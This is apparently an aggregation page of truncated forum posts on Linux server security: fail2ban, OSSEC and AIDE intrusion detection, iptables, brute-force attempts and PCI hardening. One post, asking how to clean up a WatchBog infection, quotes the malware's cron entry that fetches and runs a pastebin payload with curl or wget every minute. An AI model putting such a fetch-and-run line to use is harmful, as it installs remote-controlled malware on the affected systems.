similar to: file2ban

When we designed our systems on asterisk we designed it to me multi-tenant. Se we use customer prefixes on all extensions. This allows us to have multiple customers using the same extension pools. It also reduces the hack foot print as hackers must know the prefix for a customer to try and brute force things. All passwords use 8+ characters with alfa/numeric and special characters. As I see

Hello, I have read and seen many options for additions to Iptables as a firewall and security system. All seem to react to logs and not to incoming packets (as far as I have seen) I am interested in doing a number of security ideas to the firewall, iptables, on my webserver. If you have a program you would suggest or believe iptables is the proper solution, please feel free to post that. Here

Puppet custom functions and user permissions I am busy writing a custom function to automatically add OSSEC agents to a OSSEC server after installation. Unfortunately, it seems that puppetmasterd is not respecting the entries in /etc/group in linux. No matter how many other groups the puppet user has been added to in /etc/ group, when puppetmasterd runs the custom function the effective/real user

Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade

Hi Friends! I need to prepare a script which will grep logs from the current time to previous 5 mins that is if the current time is Mon Jun 13 12:40:40 IST 2011 then all the logs between the interval Mon Jun 12:35 - 12:40 2011 should be grepped by the script and append it to another file. However, the below script is not able to grep the desired logs, so I need some help in preparing the script.

Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based

Hi. I have an interesting use case. OSSEC is security tool based on server-client architecture. Server generates keys for agents, and every agent has different key. Now I want to distribute these keys via puppet. I''ve come accross hiera and installed it, and it works superbly, but how to store per-node key in hiera? This is my idea: hiera,yaml: --- :hierarchy: -

... using it as a tool and understanding what it does... So one part of it's toolset identifys valid SIP accounts - and I was under the impression that alwaysauthreject=yes was supposed to stop this... However, it sends a request for a highly probably non-existent account, then sends requests for probably existing accounts and I guess compares the results - account not found vs. bad

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

Hello all. I have been running running centos 4.5 final for some time with any problems. Been running great, until today. System was frozen and /var/log/messages showed: Aug 15 23:01:28 mydomain kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Aug 15 23:01:28 mydomain kernel: printing eip: Aug 15 23:01:28 mydomain kernel: c01b2de4 Aug 15 23:01:28 mydomain

I read an article today about keyboard interactive auth allowing bruteforcing. I'm afraid I have minimal understanding of what keyboard-interactive really does. What does it do, and should I have my clients set it to off in sshd_config? --- Scott Neugroschl | XYPRO Technology Corporation 4100 Guardian Street | Suite 100 |Simi Valley, CA 93063 | Phone 805 583-2874|Fax 805 583-0124 |

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be

I have just deployed a new CentOS 6.4 image on AWS, and I'm having issues with init.d scripts not starting up. I've verified the following; 1) They work on their own after boot 2) They're set to run at runlevel 3,4, and 5 via chkconfig 3) The system boots up in runlevel 3 (no GUI) 4) There are no lingering PID files around after boot 5) Permissions

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

... Looking for a recommendation for a commercial threat management package. ( Think antivirus / antispy / anti-rootkit -- all rolled into one engine ), similar to this product: http://usa.kaspersky.com/products_services/work-space-security.php, which currently only supports one kernel for FC6, and RHEL4, officially. Here's the background. Need to make a decision and investment for a

Hi folks, In the company where i work, we are implementing a security standard. A part of this is a log monitoring and reporting software. There are a few requirements, that the software must fulfil: - It must be capable of collecting logs from different devices (Linux machines, network equipment, ...). - it must be capable of sending alarms on security events - it has to generate daily (weekly,

I'm seeing a lot of activity over the last two days with what looks to be a kiddie script. Mostly trying to access several of our servers with the username anna. All failed... in fact I don't think we have a user anna on any of our servers. Meanwhile... I'm running Sendmail. This pertains to Centos 4 and 5 servers. I'm also running fail2ban on some and Ossec on others. So far,